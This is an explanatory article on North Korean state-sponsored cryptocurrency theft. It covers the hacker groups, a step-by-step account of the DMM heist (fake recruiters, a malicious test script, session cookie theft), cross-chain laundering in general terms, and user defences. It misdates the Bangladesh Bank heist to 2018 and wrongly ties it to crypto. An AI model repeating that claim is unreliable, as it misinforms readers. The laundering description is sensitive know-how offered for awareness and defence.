How North Korea Stole $3 Billion in Crypto: The Hacker Tactics You Need to Know

Imagine losing your entire life savings in a single click. Now multiply that feeling by millions of users and scale it up to billions of dollars. That is exactly what has happened over the last decade. Between 2017 and 2023, state-sponsored hackers from North Korea stole approximately $3 billion in cryptocurrency. This wasn't random crime; it was a systematic campaign designed to fund weapons programs while bypassing international sanctions. With recent massive heists like the February 2025 attack on Bybit stealing nearly $1.5 billion in Ether, the threat level has never been higher. Understanding how these groups operate is no longer just for cybersecurity experts-it's essential for anyone holding digital assets.

The Scale of the Theft: From Millions to Billions

The numbers behind North Korean cybercrime are staggering. According to United Nations Security Council assessments reported in late 2024, these operations have accelerated dramatically. In 2023 alone, hackers stole $660.5 million across 20 incidents. By 2024, that figure jumped to $1.34 billion across 47 separate attacks-a 102% increase in just one year. This surge indicates that as traditional revenue sources dry up due to global economic pressure, Pyongyang relies more heavily on digital theft.

The most shocking example occurred in February 2025 when the Dubai-based exchange Bybit lost nearly $1.5 billion worth of Ether. Blockchain analysis firm Chainalysis classified this as the largest cryptocurrency theft in history. To put that in perspective, this single heist exceeded the combined value of all 47 cryptocurrency robberies attributed to North Korea throughout the entirety of 2024. It shows that these actors are not only getting bolder but also significantly more sophisticated in their execution.

Who Are the Hackers? Key Groups Behind the Attacks

These aren't lone wolves working from basements. They are organized units with military-grade resources. Several specific groups have been identified by intelligence agencies and cybersecurity firms:

• Lazarus Group: One of the oldest and most notorious groups, known for early major hacks like the 2018 Bangladesh Bank heist (which involved crypto) and various DeFi protocol exploits.
• TraderTraitor: Responsible for several high-profile 2023 incidents, including the $100 million hack of Atomic Wallet and attacks on Alphapo and CoinsPaid.
• Jade Sleet: Known for targeting cryptocurrency exchanges and wallet providers with refined social engineering tactics.
• UNC4899 and Slow Pisces: Additional aliases used to track different operational cells within the broader North Korean cyber apparatus.

In 2024, these North Korea-affiliated groups accounted for 61% of all cryptocurrency stolen globally, despite representing only 20% of total incidents. This disparity highlights their superior targeting and execution capabilities compared to other cybercriminal organizations.

How They Do It: Social Engineering Over Brute Force

You might expect complex code-breaking or quantum computing breakthroughs. Surprisingly, the biggest weakness they exploit is human error. Their primary weapon is advanced social engineering. A prime example is the May 2024 attack on the Japanese platform DMM, which resulted in a $308 million loss.

Here is how the attack unfolded:

1. The Hook: Hackers posed as recruiters on LinkedIn. They targeted employees at Ginco, a Japan-based enterprise cryptocurrency wallet software company.
2. The Payload: Victims received a malicious Python script disguised as a pre-employment test hosted on GitHub. When an employee ran the script, it compromised their device.
3. The Access: The attacker exploited session cookie information to impersonate the employee. This gave them access to Ginco's unencrypted communications system.
4. The Heist: In mid-May 2024, the hackers manipulated a legitimate transaction request made by a DMM employee. They redirected 4,502.9 BTC (worth $308 million at the time) to wallets they controlled.

This multi-stage attack took months to execute. The initial compromise happened in March, but the theft didn't occur until May. This patience allows them to map out internal systems, understand approval workflows, and strike when the risk of detection is lowest.

Laundering the Loot: Moving Money Across Chains

Stealing the money is only half the battle. The real challenge is spending it without triggering alarms. North Korean hackers have become masters of cross-chain laundering. After the Bybit hack, FBI investigations revealed that attackers were rapidly converting stolen Ether into Bitcoin and other digital currencies.

They use decentralized exchanges (DEXs) and cross-chain bridges to move funds quickly. For instance, they might convert stolen Ether to USDT, then bridge it to a different blockchain like Tron or Solana, before dispersing it across thousands of virtual wallets. This process obscures the origin of the funds and complicates law enforcement tracing efforts. TRM Labs analysis showed that this dispersion strategy makes it incredibly difficult for regulators to freeze assets once they leave the immediate vicinity of the hack.

Why This Matters to You: The Ripple Effect

You might think, "I'm not an exchange CEO, why should I care?" The reality is that these attacks destabilize the entire market. When billions disappear overnight, user confidence plummets. Exchanges face increased insurance costs and stricter regulatory scrutiny. These costs are often passed down to users in the form of higher fees or reduced liquidity.

Furthermore, the success of these operations incentivizes other criminal groups to adopt similar tactics. The cryptocurrency industry faces cumulative losses exceeding $5 billion from North Korean operations alone between 2017 and 2024. This creates a hostile environment where security must be paramount. If you hold crypto, you need to understand that centralized platforms are targets. Diversifying storage methods and using hardware wallets can mitigate some risks, but the systemic vulnerability remains.

Defending Against State-Sponsored Threats

While individuals cannot stop nation-state hackers, they can reduce their exposure. The key takeaway from the DMM and Bybit cases is that trust in centralized intermediaries carries risk. Here are practical steps to enhance your security posture:

• Use Hardware Wallets: Keep long-term holdings in cold storage devices that are air-gapped from the internet. This prevents remote malware from accessing your private keys.
• Verify Communication Channels: Be wary of unsolicited messages on professional networks like LinkedIn. Never run scripts or open attachments from unknown sources, even if they appear to come from reputable companies.
• Enable Multi-Factor Authentication (MFA): Use hardware security keys (like YubiKey) rather than SMS or app-based codes, which can be intercepted or phished.
• Diversify Platforms: Don't keep all your assets on one exchange. Spread risk across multiple reputable platforms and self-custody solutions.
• Monitor Blockchain Activity: Use tools provided by firms like Chainalysis or independent block explorers to monitor unusual activity related to your assets, though this is more relevant for large holders.

The landscape is evolving. As sanctions intensify, North Korea will likely continue to expand its cyber operations. The FBI, National Police Agency of Japan, and international partners are actively investigating and attributing these attacks, but prevention remains the best defense. Stay informed, stay skeptical, and secure your keys.